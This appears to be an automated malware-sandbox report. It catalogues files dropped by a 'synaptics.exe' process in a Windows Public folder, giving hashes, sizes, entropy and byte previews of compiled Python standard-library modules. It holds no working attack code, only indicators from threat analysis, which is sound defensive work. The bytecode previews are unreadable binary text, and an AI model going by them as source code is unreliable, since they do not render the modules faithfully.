                                                                                                                                                                                      SSDEEP:1536:11qqs3deqQmjuqJqq9qhIOGqaqzIVqOq/sqmqeXWqJqZqoqfqEqNqqBNqzSq2qfe:8amjPaWNFGc81veYm1o4Jg5wLlf8x7LR
                                                                                                                                                                                      MD5:057B351C81584E9BCED8FC280316481B
                                                                                                                                                                                      SHA1:748EEFF2FDFEE868D6E0114D0FB5A192D6CE8425
                                                                                                                                                                                      SHA-256:15D26F6A8541F21624DF312769241FAE55729D524E3D773852692290D836B3D7
                                                                                                                                                                                      SHA-512:0B415F273302EDA2FA691B81912EBEA499E204740DE301F786FF89D2D9A2335192B9F0B2528BBDAD44BDAECA4E1B9C385266E6E39C340C5DC0E7C255EBB2D965
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.,.......................@...s....d.Z.d.Z.d.d.l.Z.d.Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.d...Z.d=d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.G.d#d$..d$..Z.d.a.e.j.G.d%d&..d&e.....Z.e.j.G.d'd(..d(e.....Z.G.d)d*..d*..Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e.e...Z.G.d1d2..d2..Z.e.e._.G.d3d4..d4..Z.G.d5d6..d6e.e...Z G.d7d8..d8e ..Z!G.d9d:..d:e.e...Z"G.d;d<..d<..Z#e#e _.d.S.)>z.A fast, lightweight IPv4/IPv6 manipulation library in Python...This library is used to create/poke/manipulate IPv4 and IPv6 addresses.and networks...z.1.0.....N. .......c....................@........e.Z.d.Z.d.Z.d.S.)...AddressValueErrorz%A Value Error related to the address.N....__name__..__module__..__qualname__..__doc__..r....r.....-C:\Users\Public\QExvbmVOb25l\lib\ipaddress.pyr.................r....c....................@...r....)...NetmaskValueErrorz%A Value Error related to the netmask.Nr....r....r....r....r....r........r....r....c................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):940
                                                                                                                                                                                      Entropy (8bit):5.420740346729624
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:TBMgKEVTSAvFwzVCI0L67avc0Kb4S0bJB674u:TzVu8wzVmxcZt0bJB65
                                                                                                                                                                                      MD5:7F3D3B359109464CAF1E0DC4DC506971
                                                                                                                                                                                      SHA1:EA38967BAAEFE9E5CFA0B651F30B46EB83B56A28
                                                                                                                                                                                      SHA-256:4F8A4618F7F19F8C489CA8BBB82D97071C77A1203DE5276DA8108A67F0E463F1
                                                                                                                                                                                      SHA-512:0398FF2617BAA1CAB5E24AECEF00394E98FD6B4CF71ACB535977284252154D288AA75F68FC810A2C3F42ADF2F58489BA76E8F3BBC0F7D847407EC9965A6FEFA4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dd........................@...s4...d.Z.g.d...Z.g.d...Z.g.d...Z.e.e...j.Z.e.e...j.Z.d.S.).a....Keywords (from "Grammar/python.gram")..This file is automatically generated; please don't muck it up!..To update the symbols in this file, 'cd' to the top directory of.the python source tree and run:.. PYTHONPATH=Tools/peg_generator python3 -m pegen.keywordgen Grammar/python.gram Grammar/Tokens Lib/keyword.py..Alternatively, you can run 'make regen-keyword'..)...iskeyword..issoftkeyword..kwlist..softkwlist)#..False..None..TrueZ.andZ.asZ.assertZ.asyncZ.awaitZ.break..classZ.continueZ.defZ.delZ.elifZ.elseZ.exceptZ.finallyZ.forZ.fromZ.globalZ.ifZ.import..inZ.is..lambdaZ.nonlocalZ.notZ.orZ.passZ.raise..returnZ.tryZ.whileZ.withZ.yield)..._Z.case..matchN)...__doc__..__all__r....r......frozenset..__contains__r....r......r....r.....+C:\Users\Public\QExvbmVOb25l\lib\keyword.py..<module>....s...........&....
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4155
                                                                                                                                                                                      Entropy (8bit):5.325878719236098
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:0Z1XLppmx0pYUG0wzU182J691Tc7mh5ae7y8:4PyN10wzg6TTc7mh5vD
                                                                                                                                                                                      MD5:133CF64ECAC33C70B434A9707C5A5CF3
                                                                                                                                                                                      SHA1:A51AB06A3B28F26428DCD830462D7B0FFC0AAAEC
                                                                                                                                                                                      SHA-256:9E36FC7BDDEAA3D8E19C2DCFD08A69A11170C715DA578530DFE3F599A51AB040
                                                                                                                                                                                      SHA-512:67C3B676D3A17FE54E6A5677525EA85D236EDED772DA5F25306EE2552A0FB06ABF18F022F5A6AF699DB45E5C90FA40F5BECA89B42F6D78DA928CEBE6B2EBC1F9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sl...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.i.Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z.Cache lines from Python source files...This is intended to read lines from modules imported -- hence if a filename.is not found, it will look down the module search path for a file by.that name.......N)...getline..clearcache..checkcache..lazycachec....................C...s....t.......d.S.).z.Clear the cache entirely.N)...cache..clear..r....r.....-C:\Users\Public\QExvbmVOb25l\lib\linecache.pyr........s......r....c....................C...s8...t.|.|...}.d.|.....k.r.t.|...k.r.n...d.S.|.|.d.....S.d.S.).z~Get a line for a Python source file from the cache.. Update the cache if it doesn't contain an entry for this file already........)...getlines..len)...filename..lineno..module_globals..linesr....r....r....r........s..............r....c....................C...sR...|.t.v.r.t.|...}.t.|...d.k.r.t.|...d...S.z.t.|.|...W.S...t.y(......t...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):46178
                                                                                                                                                                                      Entropy (8bit):6.062416669975893
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:45YArctK0pztzQUB04zzRYKJFSd6tmm+a4L+P9cLjYp:I1YKGzbB04zVYAFU6x+a4aPuL8p
                                                                                                                                                                                      MD5:B274D608C3ECDE7DBA935464C3FDD0F9
                                                                                                                                                                                      SHA1:38CB33EE40CBDF0136CA3D8C75B647B8ABE13FD3
                                                                                                                                                                                      SHA-256:266F757C064DCAE7C96551B88A3CDB90E04EC17D742DA25850F78E7B0E47AEA4
                                                                                                                                                                                      SHA-512:5FCE4C23FED736A46D18ACD5242CCFB2FDF89D6BBE917E46B71A27AC0ED07B4A9B0C575537C953384D95A4EFD3D80E8485F64B485A8948C2B309B2F8ED92B13D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.8.......................@...sF"..d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.z.d.d.l.T.W.n%..e.yW......d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.d...Z...d.d.d...Z.Y.n.w.d.e...v.r_e.Z.d.e...v.rfe.Z.e.Z.i.Z.e.. e...d.d.....Z.d.d...Z!..d.d.d...Z"d.d...Z#e..$d...Z%..d.d d!..Z&..d.d"d#..Z'..d.d$d%..Z(..d.d&d'..Z)..d.d)d*..Z*d+d,..Z.d-d...Z+..d.d/d0..Z,e-f.d1d2..Z.d3d4..Z/d5d6..Z0e.Z1d7d8..Z2d9d:..Z3d;d<..Z4d=d>..Z5d?d@..Z6..d.dBdC..Z7e.f.dDdE..Z8..d.dFd...Z.e.f.dGdH..Z9z.d.dIl.m:Z:..W.n...e...y.......dJdK..Z:Y.n.w.z.e;..W.n...e<..y.........d.dLdM..Z=Y.n.w...d.dNdM..Z=i.dOdP..dQdP..dRdS..dTdU..dVdU..dWdX..dYdZ..d[d\..d]d^..d_d`..dadS..dbdc..ddde..dfdg..dhdS..didS..djdS..i.dkdl..dmdn..dodp..dqdr..dsdg..dtdu..dvdc..dwdx..dydz..d{de..d|d}..d~d...d.d...d.d...d.dU..d.d...d.d.....dXd.d.d.d.d.d.d\d^d`d.....Z>e?e>.@....D.].\.ZAZBeA.Cd.d...ZAe>.DeAeB......q.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12113
                                                                                                                                                                                      Entropy (8bit):5.3787135439915765
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:d+KxmpkRLMC//oP1UHyszdKXnoGwKjwmAKa09hs4Nr:Tmo2UHtgNAKl9hs45
                                                                                                                                                                                      MD5:F0EC866C8A861B5EBCCC780C4C0516C8
                                                                                                                                                                                      SHA1:5656D5D52C3FE4DAC8D76B54CA58E44E7BC42F21
                                                                                                                                                                                      SHA-256:CE6E5F552D93BA306C74107AAEF541F687BCA9646F4BE7BAFE01B2D60C59C199
                                                                                                                                                                                      SHA-512:4AEBBC089A2FC56D9096564EC9B071EAC17A89C79A51FB74A3C7F72C7C7CCA5112F3EB66BE9501BDB9BCF77D4A10A677FA5877D429452C072A6329FF233B62D0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dA5.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z.m.Z...d.d.l.Z.d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.d.d.d.d.d.d.d.d.d...d.d...Z.e.d.d.d.f.d.d...Z.e.d.d.f.d.d...Z.d.S.).aS...Interface to the liblzma compression library...This module provides a class for reading and writing compressed files,.classes for incremental (de)compression, and convenience functions for.one-shot (de)compression...These classes and functions support both the XZ and legacy LZMA.container formats, as well as raw compressed data streams..)$Z.CHECK_NONEZ.CHECK_CRC32Z.CHECK_CRC64Z.CHECK_SHA256Z.CHECK_ID_MAXZ.CHECK_UNKNOWNZ.FILTER_LZMA1Z.FILTER_LZMA2Z.FILTER_DELTAZ.FILTER_X86Z.FILTER_IA64Z.FILTER_ARMZ.FILTER_ARMTHUMBZ.FILTER_POWERPCZ.FILTER_SPARC..FORMAT_AUTO..FORMAT_XZZ.FORMAT_ALONEZ.FORMAT_RAWZ.MF_HC3Z.MF_HC4Z.MF_BT2Z.MF_BT3Z.MF_BT4Z.MODE_FASTZ.MODE_NORMALZ.PRESET_DEFAULTZ.PRESET_EXTREME..LZMACompressor..LZMADecompressor..LZMAFile..LZMAError..open..compress..decompressZ.is_c
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17632
                                                                                                                                                                                      Entropy (8bit):5.6765285238011005
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:mmMcSuUoigjrH1V19yB/sWG5D+nTF+jZjB77rXw0:mjzgl0sWm4+jZjNw0
                                                                                                                                                                                      MD5:0FFA9621297DF9C739DF2A54F70FE8D2
                                                                                                                                                                                      SHA1:E055F51463CE120828108430A099D1572CAB5373
                                                                                                                                                                                      SHA-256:3535E9E66B1D7C49133B8FE5F24EDB63AF49DEDEA4660646FEB4DAFC6EB624B3
                                                                                                                                                                                      SHA-512:D9C3A26B78EDCED15672746E5C7C929E3572AE2DF7C5B59AC6363951C8437E0E4C16704CBCF5C9B419B6604C405D2C6F1B6D63B913518EE185CF067426EFB096
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y%......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.y7......d.Z.Y.n.w.g.d...Z.g.d...Z.d.a.d.a.G.d.d...d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.e.....d.d...Z.e.d.k.r|e.....d.S.d.S.).a....Guess the MIME type of a file...This module defines two useful functions:..guess_type(url, strict=True) -- guess the MIME type and encoding of a URL...guess_extension(type, strict=True) -- guess the extension for a given MIME type...It also contains the following, for tuning the behavior:..Data:..knownfiles -- list of files to parse.inited -- flag set when init() has been called.suffix_map -- dictionary mapping suffixes to suffixes.encodings_map -- dictionary mapping suffixes to encodings.types_map -- dictionary mapping suffixes to types..Functions:..init([files]) -- parse a list of files, default knownfiles (on Windows, the. default values are taken from the registry).read_mime_types(
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3946
                                                                                                                                                                                      Entropy (8bit):5.481114302614267
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:88lwQqPqiKqqHW7Nd5pqKHQwmHv35UmyhWqgv0+USVqtnqqgqhy:888Pq/qq27NVqKleemdq8LvVqtnqqgqU
                                                                                                                                                                                      MD5:2DB8CC3CB04A17FFE46180922A151DE8
                                                                                                                                                                                      SHA1:0D9A07B50F1DE042A956ADC70A6DAD9B0D82C05D
                                                                                                                                                                                      SHA-256:8E42195C5ED61254F2CDC78EC49CBB5016DD33466BC2CDEFA22C26A431B21C0E
                                                                                                                                                                                      SHA-512:9BF44DF143A974B3EBA26A3D4A4C5836D3117A37F3F24956F4CCA025E115F7801A7D5F039DFBEB4C3E84C25826C3C1DB363936FDF0494ECD7282BCAC2E4706AD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s\...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.g.Z.G.d.d...d.e...Z.G.d.d...d...Z.e.d.k.r,e.e.......d.S.d.S.).z-An object-oriented interface to .netrc files......N..netrc..NetrcParseErrorc....................@...s"...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.S.).r....z5Exception raised on syntax errors in the .netrc file.Nc....................C...s"...|.|._.|.|._.|.|._.t...|.|.....d.S...N)...filename..lineno..msg..Exception..__init__)...selfr....r....r......r.....)C:\Users\Public\QExvbmVOb25l\lib\netrc.pyr........s............z.NetrcParseError.__init__c....................C...s....d.|.j.|.j.|.j.f...S.).Nz.%s (%s, line %s)).r....r....r....).r....r....r....r......__str__....s......z.NetrcParseError.__str__).NN)...__name__..__module__..__qualname__..__doc__r....r....r....r....r....r....r........s............c....................@...s....e.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....Nc....................C...s....|.d.u.}.|.d.u.r.t.j...t.j...d...d...}.i.|._.i.|._.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15316
                                                                                                                                                                                      Entropy (8bit):5.432888374451387
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:H7fr8V5t+X9xyFga+mDB8s+qHe65jZBCrF++umt:zra/WkFga+mDGs+hsZwrF++umt
                                                                                                                                                                                      MD5:0F8E4B2E2CB1397CCD71C4EB289956F1
                                                                                                                                                                                      SHA1:748BFEB3058F7C372076F0CF0DB9B8E8B2CAABBF
                                                                                                                                                                                      SHA-256:7113CC19BEC27EF04C4399726A6C2C091F14F6FAAA17F08B783F917969259136
                                                                                                                                                                                      SHA-512:0E66B08CD8388FD5B168BA76BD506D1A5EC0E33EC0614ADC69120CB5CF815163ADEBC1DD17F9CB842CBB3136FD18C873C14B0702B325AE1DF7A3C2F2CB3C4D2E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dov.......................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.d...Z.d.d...Z.z.d.d.l.m.Z.m.Z.m.Z...d.d...Z.W.n...e.yK......d.d...Z.Y.n.w.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.j.e._.d.d...Z.d.d...Z.d d!..Z d"d#..Z!z.d.d$l"m#Z#..W.n...e.y.......d.Z#Y.n.w.d%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(z.d.d/l"m)Z)..W.n...e.y.......e(Z*Y.n.w.d0d1..Z*z.d.d2l"m+Z+m,Z-..W.n...e.y.......e*Z.Y.n.w.d3d4..Z/d5d6..Z0d7d8..d9d:..Z.e1e.d;..o.e..2..d<..d=k.Z3dCd>d?..Z4d@dA..Z5z.d.dBl"m6Z7..W.d.S...e...y.......Y.d.S.w.)Dz.Common pathname manipulations, WindowsNT/95 version...Instead of importing this module directly, import os and refer to this.module as os.path...........\..;../z..;C:\binZ.nul.....N)...*)&..normcase..isabs..join..splitdrive..split..splitext..basename..dirnameZ.commonprefixZ.getsizeZ.getmtimeZ.getatimeZ.getctime..islink..exists..lexists..isdir..isfile..ismount..expanduser..expandvars..normpath..abspath..curdir..pardir..sep..p
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1760
                                                                                                                                                                                      Entropy (8bit):5.538011062591141
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:k5kKoXsYZdrK2ESp8ItqhhhUIuoLpP0I2GIikGmObMn:khoP27OqhDaodpkwbMn
                                                                                                                                                                                      MD5:81520F63E7DF46A697FEE0536AA837B5
                                                                                                                                                                                      SHA1:CD0FB6EE01CAE81DAF3043BC4A227AD734EB39AD
                                                                                                                                                                                      SHA-256:0F5CC130E8A14F2EDB9FEA8F3BAA237E8BC82179DE62EDD8642A78F62D99E5A9
                                                                                                                                                                                      SHA-512:28623B981EC47A82691757C1CD5706CCFE42386094BFC546681FDEDC371E9C6F91A989006FF7866EDBA6433AA9217BD7FDF4F86B03F3804DBAFBA3AB720D8DA0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d...Z.d.d...Z.d.S.).z.Convert a NT pathname to a file URL and vice versa...This module only exists to provide OS-specific code.for urllib.requests, thus do not use directly..c....................C...s....d.d.l.}.d.d.l.}.|...d.d...}.d.|.v.r.|.d.d.....d.k.r |.d.d.....}.|...d...}.|.j...d...|.....S.|...d...}.t.|...d.k.sB|.d...d...|.j.v.rJd.|...}.t.|.....|.d...d.......}.|.d.....d...}.|.d...}.|.D.].}.|.rm|.d...|.j...|.....}.q_|...d...r||...d...r||.d.7.}.|.S.).z{OS-specific conversion from a relative URL of the 'file' scheme. to a file system path; not recommended for general use......N..:..|.....z.////......./..\.....z.Bad URL: .....)...string..urllib.parse..replace..split..parse..unquote..join..len..ascii_letters..OSError..upper..endswith)...urlr......urllib..components..comp..error..drive..path..r......C:\Users\Public\QExvbmVOb25l\lib\nturl2path.py..url2pathname....s*.............................................r....c..................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5460
                                                                                                                                                                                      Entropy (8bit):5.65097332605992
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:ksgyb2Y4AiIw0UEDJdWz1NA/DFi1foNC3SdGCDO1WnOhf:sySYRRDXfk1fb3H3WnOhf
                                                                                                                                                                                      MD5:A1F717CA67735A72710BD3439E9955CF
                                                                                                                                                                                      SHA1:8EE5BE0608514136D154D43AF6664B8B3B1E0459
                                                                                                                                                                                      SHA-256:416E2820E3BCF8080A5E875AA12A44AE14811B96838AC510213F3EC87A7A632B
                                                                                                                                                                                      SHA-512:07010B285348A2DCA17415F52660D9DD14C86D3999436DF8C569FB3395B1A75BAC41C67EB752222271D6931E2CEA01F5086D344255D4177B3FBA6E90AD8F5928
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s"...d.Z.g.d...Z.z.d.d.l.m.Z...e...d.....W.n...e.y.......Y.n.w.d.Z.g.Z.g.Z.g.Z.g.Z.g.Z.g.Z.g.Z.g.Z.i.Z.d.d...e.d...D...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d ....e.d!d"....e.d#d$....e.d%d&....e.d'd(....e.d)d*....e.d+d,....e.d-d.....e.d/d0....e.d1d2....e.d3d4....e.d5d6....e.d7d8....e.d9d:....e.d;d<....e.d=d>....e.d?d@....e.dAdB....e.dCdD....e.dEdF....e.dGdH....e.dIdJ....e.dKdL....e.dMdN....e.dOdP....e.dQdR....e.dSdT....e.dUdV....e.dWdX....e.dYdZ....e.d[d\....e.d]d^....e.d_d`....e.dadb....e.dcdd....e.dedf....e.dgdh....e.didj....e.dkdl....e.dmdn....e.dodp....e.dqdr....e.dsdt....e.dudv....e.dwdx....e.dydz....e.d{d|....e.d}d~....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....d.Z.e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e...d.....e.d.d.....e.d.d.....e.d.d.....e.d.d.....e.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13521
                                                                                                                                                                                      Entropy (8bit):4.8472579053762095
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:+25I4L+Hse0C1/u2/DqnsvQgZ2CsisKoVk7tlipYMpA+B8eLq4UZfm:N5FeTs2rwejZ2CMKoqt0pYkTSeLAfm
                                                                                                                                                                                      MD5:E2BA5911F122B550E81AC86DDDA18323
                                                                                                                                                                                      SHA1:5085ADF53848BC58EDF161DBA1236A08ACF18A9D
                                                                                                                                                                                      SHA-256:51EDAB5A122589B0B38AB0019101C85618BDC1C23510EA8C69436BD69482A292
                                                                                                                                                                                      SHA-512:0B60C4E44E3E0AE284B8A400F35AD8B0E2C64B3318D7B38D96969BA593BF72DB64A1F392380AED49288B422C718033718ED64662A0D74157592F40D26D36DA2E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.+.......................@...s....d.Z.g.d...Z.d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.e.Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,d-..Z.d.d/..Z.d0d1..Z.d2d3..Z.d4d5..Z.d6d7..Z.d8d9..Z.d:d;..Z d<d=..Z!d>d?..Z"d@dA..Z#dBdC..Z$dDdE..Z%dFdG..Z&dHdI..Z'dqdJdK..Z(G.dLdM..dM..Z)G.dNdO..dO..Z*G.dPdQ..dQ..Z+dRdS..Z,dTdU..Z-dVdW..Z.dXdY..Z/dZd[..Z0d\d]..Z1d^d_..Z2d`da..Z3dbdc..Z4ddde..Z5dfdg..Z6dhdi..Z7djdk..Z8dldm..Z9z.d.dnl:T.W.n...e;y.......Y.n.w.d.dol:m.Z...e.Z<e.Z=e.Z>e.Z?e.Z@e.ZAe.ZBe.ZCe.ZDe.ZEe.ZFe.ZGe.ZHe.ZIe.ZJe.ZKe.ZLe.ZMe.ZNe.ZOe.ZPe.ZQe.ZRe.ZSe.ZTe ZUe!ZVe"ZWe$ZXe%ZYe'ZZe,Z[e-Z\e.Z]e/Z^e0Z_e1Z`e2Zae3Zbe4Zce5Zde6Zee7Zfe8Zge9ZhdpS.)ras....Operator Interface..This module exports a set of functions corresponding to the intrinsic.operators of Python. For example, operator.add(x, y) is equivalent.to the expression x+y. The function names are those used for special.methods; variants
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):31612
                                                                                                                                                                                      Entropy (8bit):5.452333319472934
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:mZz401oaK+W0l85fOHqjQmZxhVQIuA5+LBL3L8LOULOLwvLdLtg4aE2aYiZ9:QbK+WHaKQmZBw2LN2Y
                                                                                                                                                                                      MD5:05C6AD7B193923DA42B23DE4C5D27502
                                                                                                                                                                                      SHA1:C729C38E7BC62983418230B605AE4A041C0A9456
                                                                                                                                                                                      SHA-256:6D359A390187883352FC1A84986B3437E4FCA870A5DC48E86E0421A5651E035D
                                                                                                                                                                                      SHA-512:FBFB81DCEC893FDAC516DE1839D891476C6BA149224983732DB857FC612707F65FBC5372DCEC911B7046CACEDA5DEC687D08D20182992B340D3B2A63B9832A25
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d........................@...sh...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.e.....Z.e.j.Z.g.d...Z.d.d...Z.d.d...Z.d.e.v.rod.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.yK......Y.n.w.d.d.l.Z.z.d.d.l.m.Z...W.n...e.ya......Y.n.w.d.d.l.Z.e...e.e.......[.nId.e.v.r.d.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.y.......Y.n.w.d.d.l.Z.d.d.l.Z.e...e.e.......[.z.d.d.l.m.Z...W.n...e.y.......Y.n.w.e.d.....e.e.j.d.<.d.d.l.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%..[.e.d.....r.e&..Z'd.d...Z(e)..Z*e(d.d.....e(d.d.....e(d.d.....e(d.d.....e(d.d ....e(d!d"....e(d#d$....e(d%d&....e(d'd(....e(d)d*....e(d+d,....e(d-d.....e(d/d0....e(d1d2....e(d1d3....e(d4d ....e*Z+e)..Z*e(d.d.....e*Z,e)..Z*e(d5d6....e(d7d.....e(d8d.....e(d9d:....e(d9d;....e(d<d=....e*.-e.....e(d>d?....e(d@d ....e(dAd ....e(dBdC....e.dD....r.e.dE....r.e(dFdD....e*Z.e)..Z*e(d.d.....e(d.d.....e(d.d.....e(dGdH....e(dId.....e.dJ....r.e(dKd.....e(d!d"....e(dLd ....e(dMd.....e(d.d.....e(d4d ....e(dNd.....e*Z/[*[.['[(d.Z0dOZ1dPZ2d.dSdT..Z3
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):42065
                                                                                                                                                                                      Entropy (8bit):5.237215862260339
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:e8Hqw6LgaOSKyzD3ZslxWCPnN3v5HgAgRDTMJ68UH73dT0Lwp4oMcce2A6VJSWm+:rKw6LL3MvPnN3v5HgAmDTMK7N8wpjMiS
                                                                                                                                                                                      MD5:DDBAF4AA9239C4EE7B6AC95E231486FE
                                                                                                                                                                                      SHA1:EAB663B54E29D079505DD2654A22F548FC19956C
                                                                                                                                                                                      SHA-256:A27A883599C053F23B71915B54ABFFB0BA054B0533EEB6C645FC3EA291500373
                                                                                                                                                                                      SHA-512:2438F39E08474381B2A1E9E65CED1E832FFBA584B5C1FE533CA5342F98873DB614A7CDAEF5A594506E4512A9AA25671DB8DE97B9D825F03A88500D23383CE169
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
